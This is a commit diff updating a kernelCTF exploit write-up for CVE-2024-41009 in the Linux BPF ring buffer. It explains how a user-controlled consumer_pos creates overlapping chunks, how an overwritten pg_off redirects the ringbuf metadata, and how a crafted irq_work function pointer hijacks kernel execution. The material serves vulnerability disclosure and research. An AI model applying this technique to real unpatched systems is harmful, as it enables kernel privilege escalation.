Update exploit.md

google · Dec 6, 2024 · 887c7dd · 887c7dd
1 parent 5250981
commit 887c7dd
Showing 1 changed file with 113 additions and 37 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2024-41009_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-41009_lts_cos/docs/exploit.md
@@ -1,73 +1,150 @@
 # Background
+Taken from [commit message](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=cfa1a2329a691ffd991fcf7248a57d752e712881):
+
+> The BPF ring buffer internally is implemented as a power-of-2 sized circular buffer, with two logical and ever-increasing counters: consumer_pos is the consumer counter to show which logical position the consumer consumed the data, and producer_pos which is the producer counter denoting the amount of data reserved by all producers.<br><br>
+Each time a record is reserved, the producer that "owns" the record will successfully advance producer counter. In user space each time a record is read, the consumer of the data advanced the consumer counter once it finished processing. Both counters are stored in separate pages so that from user space, the producer counter is __read-only__ and the consumer counter is __read-write__.
+
+This is structure layout of bpf_ringbuf:
+```
+struct bpf_ringbuf {
+	wait_queue_head_t waitq;
+	struct irq_work work;
+	u64 mask;
+	struct page **pages;
+	int nr_pages;
+	spinlock_t spinlock ____cacheline_aligned_in_smp;
+	atomic_t busy ____cacheline_aligned_in_smp;
+	unsigned long consumer_pos __aligned(PAGE_SIZE); // read-write from user space
+	unsigned long producer_pos __aligned(PAGE_SIZE); // read-only from user space
+	unsigned long pending_pos;
+	char data[] __aligned(PAGE_SIZE);
+};
+```
+
 `BPF_FUNC_ringbuf_reserve` is used to allocate a memory chunk from `BPF_MAP_TYPE_RINGBUF`.  It reverses 8 bytes space to record header structure.
 ```C
 /* 8-byte ring buffer record header structure */
 struct bpf_ringbuf_hdr {
-u32 len;
-u32 pg_off;
+	u32 len;
+	u32 pg_off;
 };
 ```
-And return `(void *)hdr + BPF_RINGBUF_HDR_SZ` for ebpf program to use.  ebpf program is unable to modify `bpf_ringbuf_hdr` due to it is outside of memory chunk.  
+And return `(void *)hdr + BPF_RINGBUF_HDR_SZ` for eBPF program to use.  eBPF program is unable to modify `bpf_ringbuf_hdr` due to it is outside of memory chunk.  
 
 But with malformed `&rb->consumer_pos`, it's possible to make second allocated memory chunk overlapping with first chunk.  
-As the result, ebpf program is able to edit first chunk's hdr.  
+As the result, eBPF program is able to edit first chunk's hdr. This is how we do it: 
 
-For example, we create a `BPF_MAP_TYPE_RINGBUF` with size is 0x4000. Modify `consumer_pos` to 0x3000 before call `BPF_FUNC_ringbuf_reserve`.  
-
-Allocate chunk A, it will be in `[0x0,0x3008]`, and ebpf program is able to edit `[0x8,0x3008]`.  Now allocate chunk B with size 0x3000, it will sucess because we edit consumer_pos ahead to pass the check. Chunk B will be in `[0x3008,0x6010]`, and ebpf program is able to edit `[0x3010,0x6010]`.  
+1. First, we create a `BPF_MAP_TYPE_RINGBUF` with size is 0x4000. Modify `consumer_pos` to 0x3000 before call `BPF_FUNC_ringbuf_reserve`.
+2. Allocate chunk A, it will be in `[0x0,0x3008]`, and eBPF program is able to edit `[0x8,0x3008]`.
+3. Now allocate chunk B with size 0x3000, it will sucess because we edit consumer_pos ahead to pass the check.
+4. Chunk B will be in `[0x3008,0x6010]`, and eBPF program is able to edit `[0x3010,0x6010]`.  
 
+In kernel code side, this is how they do the check.
 ```C
+ static void *__bpf_ringbuf_reserve(struct bpf_ringbuf *rb, u64 size)
+ {
+	...
+	len = round_up(size + BPF_RINGBUF_HDR_SZ, 8);
+	...
+ 	prod_pos = rb->producer_pos;
+ 	new_prod_pos = prod_pos + len;
 /* check for out of ringbuf space by ensuring producer position
 * doesn't advance more than (ringbuf_size - 1) ahead
 */
-if (new_prod_pos - cons_pos > rb->mask) {
-spin_unlock_irqrestore(&rb->spinlock, flags);
-return NULL;
+	if (new_prod_pos - cons_pos > rb->mask) {
+		// failed path
+		spin_unlock_irqrestore(&rb->spinlock, flags);
+		return NULL;
+	}
+	// success path
 }
 ```
+It can pass the checked, because `cons_pos` had a value 0x3000 (edited via userspace), `new_prod_pos` (0x6010), and `rb->mask` (0x4000 - 1) will satisfy the condition and return buffer allocated in `[0x3008,0x6010]` for the eBPF program.
 
-Due to ringbuf memory layout in the following description.  
+Due to ringbuf memory layout is allocated in the following way:  
 ```C
-/* Each data page is mapped twice to allow "virtual"
-* continuous read of samples wrapping around the end of ring
-* buffer area:
-* ------------------------------------------------------
-* | meta pages |  real data pages  |  same data pages  |
-* ------------------------------------------------------
-* |            | 1 2 3 4 5 6 7 8 9 | 1 2 3 4 5 6 7 8 9 |
-* ------------------------------------------------------
-* |            | TA             DA | TA             DA |
-* ------------------------------------------------------
-*                               ^^^^^^^
-*                                  |
+static struct bpf_ringbuf *bpf_ringbuf_area_alloc(size_t data_sz, int numa_node)
+{
+	int nr_meta_pages = RINGBUF_NR_META_PAGES;
+	int nr_data_pages = data_sz >> PAGE_SHIFT;
+	int nr_pages = nr_meta_pages + nr_data_pages;
+	...
+	/* Each data page is mapped twice to allow "virtual"
+	 * continuous read of samples wrapping around the end of ring
+	 * buffer area:
+	 * ------------------------------------------------------
+	 * | meta pages |  real data pages  |  same data pages  |
+	 * ------------------------------------------------------
+	 * |            | 1 2 3 4 5 6 7 8 9 | 1 2 3 4 5 6 7 8 9 |
+	 * ------------------------------------------------------
+	 * |            | TA             DA | TA             DA |
+	 * ------------------------------------------------------
+	 *                               ^^^^^^^
+	 *                                  |
+	 * Here, no need to worry about special handling of wrapped-around
+	 * data due to double-mapped data pages. This works both in kernel and
+	 * when mmap()'ed in user-space, simplifying both kernel and
+	 * user-space implementations significantly.
+	 */
+	array_size = (nr_meta_pages + 2 * nr_data_pages) * sizeof(*pages);
+	pages = bpf_map_area_alloc(array_size, numa_node);
+	if (!pages)
+		return NULL;
+
+	for (i = 0; i < nr_pages; i++) {
+		page = alloc_pages_node(numa_node, flags, 0);
+		if (!page) {
+			nr_pages = i;
+			goto err_free_pages;
+		}
+		pages[i] = page;
+		if (i >= nr_meta_pages)
+			pages[nr_data_pages + i] = page;
+	}
+
+	rb = vmap(pages, nr_meta_pages + 2 * nr_data_pages,
+		  VM_MAP | VM_USERMAP, PAGE_KERNEL);
+	...
+}
 ```
 
-`[0x0,0x4000]` and `[0x4000,0x8000]` points to same data pages.  
-It means that chunk B at `[0x4000,0x4008]` is chunk A's hdr.  
+`[0x0,0x4000]` and `[0x4000,0x8000]` points to same data pages. It means that we can access chunk B at `[0x4000,0x4008]` that will point to chunk A's hdr.
 
+# Exploit
 `BPF_FUNC_ringbuf_submit`/`BPF_FUNC_ringbuf_discard` use hdr's pg_off to locate the meta pages.  
 
 ```C
 bpf_ringbuf_restore_from_rec(struct bpf_ringbuf_hdr *hdr)
 {
-unsigned long addr = (unsigned long)(void *)hdr;
-unsigned long off = (unsigned long)hdr->pg_off << PAGE_SHIFT;
+	unsigned long addr = (unsigned long)(void *)hdr;
+	unsigned long off = (unsigned long)hdr->pg_off << PAGE_SHIFT;
 
-return (void*)((addr & PAGE_MASK) - off);
+	return (void*)((addr & PAGE_MASK) - off);
 }
 static void bpf_ringbuf_commit(void *sample, u64 flags, bool discard)
 {
-unsigned long rec_pos, cons_pos;
-struct bpf_ringbuf_hdr *hdr;
-struct bpf_ringbuf *rb;
-u32 new_len;
+	unsigned long rec_pos, cons_pos;
+	struct bpf_ringbuf_hdr *hdr;
+	struct bpf_ringbuf *rb;
+	u32 new_len;
+
+	hdr = sample - BPF_RINGBUF_HDR_SZ;
+	rb = bpf_ringbuf_restore_from_rec(hdr);
+```
 
-hdr = sample - BPF_RINGBUF_HDR_SZ;
-rb = bpf_ringbuf_restore_from_rec(hdr);
+`pg_off` in bpf_ringbuf_hdr is the chunks's page offset from bpf_ringbuf structure, so `bpf_ringbuf_restore_from_rec` will substract the ringbuf chunk with `pg_off` to locate `bpf_ringbuf` object. If we see this structure again:
+```C
+struct bpf_ringbuf {
+	...
+	unsigned long consumer_pos __aligned(PAGE_SIZE); // read-write from user space
+	unsigned long producer_pos __aligned(PAGE_SIZE); // read-only from user space
+	unsigned long pending_pos;
+	char data[] __aligned(PAGE_SIZE);
+}
 ```
+Suppose chunk A located at the first page of `rb->data`, using bug's primitive we modify `pg_off` of chunk A to `2`, then the meta pages that calculated with `bpf_ringbuf_restore_from_rec` will point to the `rb->consumer_pos`. We can mmap `rb->consumer_pos` and control its content.
 
-# Exploit
-We modify `pg_off` of chunk A to `2`, so the meta pages that calculated with `bpf_ringbuf_restore_from_rec` will point to our controlled content at mmap-ed consumer pos data.
+By crafting `work` field inside `bpf_ringbuf` and call `bpf_ringbuf_commit` with `BPF_RB_FORCE_WAKEUP` it will call our crafted `irq_work` object to `irq_work_queue`.
 ```C
 static void bpf_ringbuf_commit(void *sample, u64 flags, bool discard)
 {
@@ -79,7 +156,6 @@ static void bpf_ringbuf_commit(void *sample, u64 flags, bool discard)
 		irq_work_queue(&rb->work);\
   ...
 ```
-By crafting `work` field inside `bpf_ringbuf` and call `bpf_ringbuf_commit` with `BPF_RB_FORCE_WAKEUP` it will call our crafted `irq_work` object to `irq_work_queue`.
 Crafted irq_work will processed at `irq_work_single` and will execute our controlled function pointer.
 ```C
 void irq_work_single(void *arg)